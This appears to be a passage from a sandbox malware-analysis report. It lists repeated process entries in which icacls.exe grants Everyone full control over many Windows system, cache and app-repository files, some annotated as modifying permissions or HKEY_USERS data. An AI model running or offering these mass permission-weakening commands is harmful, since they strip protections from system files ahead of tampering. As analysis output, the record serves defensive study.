C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\ecbc2601-0a67-4963-e594-43c65d6ec9a5.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\eee47229-947d-2ac7-e8a3-49bafee251d1.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\fc93b452-8a84-dede-3b7a-0fc9413c4592.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\cversions.2.db /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\1527c705-839a-4832-9118-54d4Bd6a0c89_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\c5e2524a-ea46-4f67-841f-6a9465d9d515_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\CortanaListenUIApp_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\DesktopView_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\EnvironmentsApp_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\HoloCamera_1.0.0.5_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\HoloItemPlayerApp_1.0.0.2_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\HoloShell_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.3DBuilder_13.0.10349.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.AAD.BrokerPlugin_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Advertising.Xaml_10.0.1605.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BingWeather_4.18.56.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BingWeather_4.18.56.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BioEnrollment_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.DesktopAppInstaller_1.0.10252.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Getstarted_4.5.6.0_neutral_split.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Getstarted_4.5.6.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.LockApp_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Messaging_3.2.24002.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Messaging_3.26.24002.0_neutral_split.scale-150_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Modifies data under HKEY_USERS
-
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Modifies data under HKEY_USERS
-
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Microsoft3DViewer_1.1702.21039.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Microsoft3DViewer_1.1702.21039.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftEdge_40.15063.0.0_neutral__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftOfficeHub_2017.311.255.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftStickyNotes_1.4.101.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Runtime.1.3_1.3.23901.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Runtime.1.3_1.3.23901.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Runtime.1.4_1.4.24201.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Office.OneNote_2015.7668.58071.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.OneConnect_2.1701.277.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.OneConnect_2.1701.277.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.People_10.1.10531.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.People_10.1.10531.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.PPIProjection_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.SkypeApp_11.8.204.0_neutral_split.scale-125_kzf8qxf38zg5c.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.StorePurchaseApp_1.0.45.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.StorePurchaseApp_1.0.454.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.VCLibs.140.00_14.0.24123.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.VCLibs.140.00_14.0.24123.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Wallet_1.0.16328.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.Apprep.ChxApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.AssignedAccessLockApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.CloudExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.ContentDeliveryManager_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.Cortana_1.8.12.15063_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.HolographicFirstRun_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.ModalSharePickerHost_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.OOBENetworkCaptivePortal_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.OOBENetworkConnectionFlow_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.ParentalControls_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.Photos_2016.511.9510.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.SecureAssessmentBrowser_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.ShellExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.WindowPicker_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsAlarms_2017.203.236.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCalculator_10.1702.312.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCalculator_10.1702.312.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCalculator_2017.131.1904.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\microsoft.windowscommunicationsapps_2015.7906.42257.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsMaps_2017.209.105.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsStore_11701.1001.874.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxApp_2017.113.1250.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxGameOverlay_1.15.2003.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxIdentityProvider_2016.719.1035.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneMusic_2019.16112.11621.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneVideo_2019.16112.11601.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Deployment.srd /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Deployment.srd-shm /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Deployment.srd-wal /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Machine.srd /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Machine.srd-shm /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Machine.srd-wal /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
